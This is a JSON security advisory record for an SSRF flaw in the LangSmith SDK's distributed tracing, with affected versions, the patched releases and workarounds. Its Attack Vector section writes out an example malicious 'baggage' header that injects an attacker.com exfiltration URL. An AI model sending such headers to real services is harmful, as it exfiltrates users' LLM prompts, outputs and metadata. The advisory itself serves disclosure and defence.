{"id":"GHSA-v34v-rq6j-cj6p","summary":"LangSmith Client SDK Affected by Server-Side Request Forgery via Tracing Header Injection","details":"## Summary\n\nThe LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary `api_url` values through the `baggage` header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.\n\n---\n\n## Description\n\nWhen using distributed tracing, the SDK parses incoming HTTP headers via `RunTree.from_headers()` in Python or `RunTree.fromHeaders()` in Typescript. The `baggage` header can contain replica configurations including `api_url` and `api_key` fields.\n\nPrior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's `post()` and `patch()` methods send run data to all configured replica URLs, including any injected by an attacker.\n\n---\n\n## Attack Vector\n\n1. Attacker sends an HTTP request to a vulnerable service with a malicious `baggage` header:\n   ```\n   baggage: langsmith-replicas=[{\"api_url\":\"https://attacker.com/exfil\",\"project_name\":\"x\"}]\n   ```\n\n2. The service parses the header via `RunTree.from_headers()`, storing the attacker's URL\n\n3. When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to `https://attacker.com/exfil`\n\n---\n\n## Impact\n\n- **Data Exfiltration:** Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers\n- **SSRF:** Ability to make the server send requests to arbitrary URLs, potentially targeting internal services\n\n---\n\n## Affected Use Cases\n\nApplications are vulnerable if they:\n- Use `TracingMiddleware` to automatically propagate tracing context\n- Call `RunTree.from_headers()` / `RunTree.fromHeaders()` with untrusted HTTP headers\n\n---\n\n## Remediation\n\nUpdate to the patched versions:\n- **Python:** `pip install langsmith\u003e=0.6.3`\n- **JavaScript:** `npm install langsmith@\u003e=0.4.6`\n\nThe fix filters incoming replica configurations to an allowlist of safe fields, removing `api_url`, `api_key`, and other credential fields.\n\n---\n\n## Workarounds\n\nIf unable to upgrade immediately:\n- Strip or validate the `baggage` header before passing to `from_headers()`\n- Do not use `TracingMiddleware` with untrusted traffic","aliases":["CVE-2026-25528"],"modified":"2026-02-22T23:25:43.783797Z","published":"2026-02-09T20:36:59Z","related":["CGA-3mhf-vgh6-9vg5"],"database_specific":{"github_reviewed_at":"2026-02-09T20:36:59Z","cwe_ids":["CWE-918"],"nvd_published_at":"2026-02-09T21:15:48Z","github_reviewed":true,"severity":"MODERATE"},"references":[{"type":"WEB","url":"https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-v34v-rq6j-cj6p"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25528"},{"type":"PACKAGE","url":"https://github.com/langchain-ai/langsmith-sdk"}],"affected":[{"package":{"name":"langsmith","ecosystem":"PyPI","purl":"pkg:pypi/langsmith"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0.4.10"},{"fixed":"0.6.3"}]}],"versions":["0.4.10","0.4.11","0.4.12","0.4.13","0.4.14","0.4.15","0.4.16","0.4.17","0.4.18","0.4.19","0.4.20","0.4.21","0.4.22","0.4.23","0.4.24","0.4.25","0.4.26","0.4.27","0.4.28","0.4.29","0.4.30","0.4.31","0.4.32","0.4.32rc0","0.4.33","0.4.34","0.4.35","0.4.35rc1","0.4.36","0.4.37","0.4.38","0.4.39","0.4.39rc0","0.4.39rc1","0.4.40","0.4.41","0.4.42","0.4.42rc0","0.4.43","0.4.43rc0","0.4.44","0.4.45","0.4.46","0.4.47","0.4.48","0.4.49","0.4.50","0.4.51","0.4.52","0.4.53","0.4.54","0.4.54rc0","0.4.55","0.4.56","0.4.57","0.4.58","0.4.59","0.4.60","0.5.0","0.5.1","0.5.2","0.6.0","0.6.0rc0","0.6.1","0.6.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-v34v-rq6j-cj6p/GHSA-v34v-rq6j-cj6p.json"}},{"package":{"name":"langsmith","ecosystem":"npm","purl":"pkg:npm/langsmith"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0.3.41"},{"fixed":"0.4.6"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-v34v-rq6j-cj6p/GHSA-v34v-rq6j-cj6p.json"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"}]}